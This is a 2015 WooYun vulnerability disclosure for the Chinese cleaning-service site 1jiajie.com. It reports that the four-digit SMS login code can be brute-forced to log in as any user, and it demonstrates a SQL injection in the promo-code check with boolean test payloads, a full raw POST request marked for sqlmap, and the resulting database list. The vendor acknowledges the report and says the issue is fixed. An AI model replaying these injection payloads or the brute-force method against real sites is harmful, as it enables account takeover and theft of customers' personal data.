当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140366

漏洞标题:e家洁多处漏洞打包(任意用户登录/SQL注入/全站所有数据)

相关厂商:1jiajie.com

漏洞作者: wps2015

提交时间:2015-09-11 11:56

修复时间:2015-10-26 17:58

公开时间:2015-10-26 17:58

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-11: 细节已通知厂商并且等待厂商处理中
2015-09-11: 厂商已经确认,细节仅向厂商公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

多处问题

详细说明:

0x1
e家洁采用的是手机号+动态验证码登录的;http://www.1jiajie.com/login.html

3.png


但是验证码只有4位数字,直接burp,2分钟就跑完了

4.png


这里以13111111111的测试号

5.png


0x2
点击快速下单,填写一系列信息后,进行优惠码验证阶段

6.png


这里任意输入df',报错信息为null,但是任意输入df,显示验证码不存在

7.png


为了确定是否存在注入,这里的优惠码必须为一个存在的,我网上找了个过期的:vs9bqy1j
输入vs9bqy1j' and '1'='1 和vs9bqy1j' and '1'='2 ,返回错误不一样,那么确定有注入了

POST /ajaxCheckPromoCode.html HTTP/1.1
Host: www.1jiajie.com/ajaxCheckPromoCode.html
Proxy-Connection: keep-alive
Content-Length: 53
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.1jiajie.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.6 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.1jiajie.com/quickorder.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=q17j7mr3rm5mec43o8mo5u20a7; city_code=131; Hm_lvt_8cb0dedf820ed19a12222e3b0858424a=1441897202; Hm_lpvt_8cb0dedf820ed19a12222e3b0858424a=1441897896
telephone=1311111111&freeCode=vs9bqy1j*


8.png


15库:

available databases [15]:
[*] ameituan
[*] college
[*] external_sys
[*] information_schema
[*] mysql
[*] performance_schema
[*] sms_up
[*] sq_ejiajie
[*] sq_ejiajie_crm
[*] sq_ejiajie_data
[*] sq_ejiajie_data_v2
[*] sq_ejiajie_sunshine
[*] sq_ejiajie_test
[*] sq_ejiajie_v2
[*] sq_ejiajie_v2_test


当前库206张表

9.png


6万用户

2.png


15万订单

1.png


漏洞证明:

1.png

修复方案:

过滤

版权声明:转载请注明来源 wps2015@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-11 17:57

厂商回复:

感谢您,我已经修复

最新状态:

暂无